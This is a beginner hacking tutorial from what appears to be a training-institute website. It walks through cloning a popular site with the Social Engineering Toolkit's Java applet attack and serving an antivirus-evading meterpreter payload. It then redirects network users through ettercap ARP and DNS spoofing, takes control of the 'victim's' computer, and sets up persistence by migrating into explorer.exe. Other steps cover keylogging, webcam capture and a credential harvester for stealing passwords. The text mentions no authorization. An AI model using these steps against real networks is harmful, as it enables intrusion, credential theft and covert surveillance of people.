Advanced Ethical Hacking Institute in Pune

My favourite program by far is SET (which stands for social engineering toolkit). It’s super easy to use, and gives magnificent results.

There are multiple methods of using SET. The one I will explain to you is my favourite. Basically it will copy a website and make it so that when anyone on your network visits this website, they will go to your website instead with the virus on it! If you use this method, it’s best to use sites like facebook or other ones that people frequently use.

OK on with the tutorial.

In this method, we will be using:
– A terminal
– The Social Engineering Toolkit (SET)

First start SET by going to the top right of the KALI window onto the “Applications button”, from there click “Exploitation Tools”, then “Social Engineering” and then click “set”. If there are two, click the top one.

Then we will type in 2 (Website Attack Vectors)

Please note that like I said SET is probably the easiest to use tool on KALI. From this menu, you can experiment. I will explain some of the options here.

-Java Applet Attack – Clones a site then when someone visits the site, it prompts them to run a java file. Then it will infect the victim’s computer and you will be able to control it

-Metasploit Browser Exploit – This will use metasploit (my second favourite tool on KALI) to create a server. When the victim’s computer connects to the server (by typing in your ip), they will be infected and you will be able to take control of their computer. This one is only ok because you have to somehow convince the victim to type in your ip in the address bar. Ex. 192.168.1.124:8080

-Credential Harvester Attack – This is probably the best one to use if you just want to get their facebook/gmail/whatever passwords. Basically it’ll clone a site login page. When people visit it (by typing in your ip address) they will see the login page and probably try to log in.KALI will copy what they typed in (their username and password) and send it back to you.

I will not explain the other ones as they are more complicated and not suited for a tut that was made for newbs.

Then we will wait for it to load. Once it loads it will bring up a menu with a bunch of options. We will type in “1” without the brackets

Then we will type in “1” (The Java Applet Attack Method).
It will then display some options. We will use number 2 (site cloner)

Type in the required information that it prompts you to enter.
When it asks which site you would like to clone, type in a site that you think your victims use a lot. Ex. http://www.facebook.com
When it asks to enter in your ip for the reverse connection, open up a terminal (on the main page of KALI at the top, has a little picture of a black window) and type in

Code:
ifconfig

Look for your internet address. It should say something like 192.168.1.xxx. If it says something random like 10.0.2.15, it means that you are not connected to the internet properly and you should go back into the settings and try connecting to a different router.
When it asks if you use nat/portforwarding enter in no or n.
When it asks what port to run it on type in a random port. I use port 4444.

When it asks what payload to generate, use number 14 because it is AV safe (Anti-virus undetectable)
When it asks what type of meterpreter session to use (there will be 3 options) type in number 1

When all that is done, press enter and it will start doing it’s thing.

Meanwhile, we will open up a terminal and type in:

Code:
gedit /usr/local/share/ettercap/etter.dns

This will open up a file with a bunch of weird text on it.
Scroll down to the part near the top where it says “Microsoft Sucks”
You will see a part of it that says something like this

“microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
http://www.microsoft.com PTR 198.182.196.56

we need to change the microsoft.com’s to the website that the victim will be visiting (Ex. Facebook) and we need to change the ip addresses to the ip address that we got when we entered ifconfig.

Here is an example

“facebook.com A 192.168.1.124
*.facebook.com A 192.168.1.124
http://www.facebook.com PTR 192.168.1.124

This step is ESSENTIAL for any of this to work!

We will save the file by clicking the button at the top that says save, then we will close the window. We will then open up a new terminal and enter in

Code:
ettercap -Tqi eth0 -P dns_spoof -M ARP // //

Be sure to include all of the capitals and spaces. If this doesn’t work, then your wireless interface is different than mine.

Try this ONLY if the one above didn’t work

Code:
ettercap -Tqi wlan0 -P dns_spoof -M ARP // //

Press enter and wait until it starts generating a list of ip’s.

Go back to our SET terminal and see if it is done. It is done when it starts making a list of gibberish and says starting the payload handler.

Minimize all of this then go to http://www.facebook.com on your normal computer (or whatever site you used). (We are doing this to test if it works, this will work on any computer in your network) You should be prompted to run a java plugin. Run it this time and click run on the popup window. Then return to the SET terminal.

It should have started spouting a bunch of crap. Wait until it says, finished migrating or something along those lines. This means that you have successfully infected the victim’s computer.

To interact with the victim’s computer first type in

Code:
sessions -l

(That is an “L” by the way) This will list the sessions that we have on the victim’s computer. If there are more than one, that’s good. If there is only one, that is also fine. The more the better!

Type in

Code:
sessions -i 1

This will interact with the first session. You can substitute the 1 with another number if you want to interact with another sessions

BOOM! We now have control over the victim’s computer
Google meterpreter commands to see what you can do once at this stage.

To ensure that the victim stays infected, we are going to migrate our server to the explorer.exe task on the victim’s computer. This way, they can only get us out if they restart their computer or something.

To do this first type in

Code:
ps

This will display all of the processes on the victim’s computer. You need to browse through all of that until you locate explorer.exe Look for the number beside it (it should be in the thousands) and remember it.

Go back down and type in

Code:
migrate numberthatyouremembered

Ex. migrate 3968

Wait until it says migration completed successfully
You may now use commands for the meterpreter

3 useful commands are
keyscan_start (starts a keylogger)
keyscan_dump (shows you what they have typed)
webcam_snap (takes a picture with the webcam and saves it to the computer)
getuid (Shows you the name of the computer and the name of the user)

THIS IS JUST THE TIP OF THE ICEBERG! STAY TUNED FOR MORE TUTORIALS .

 

www.extremehacking.org
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune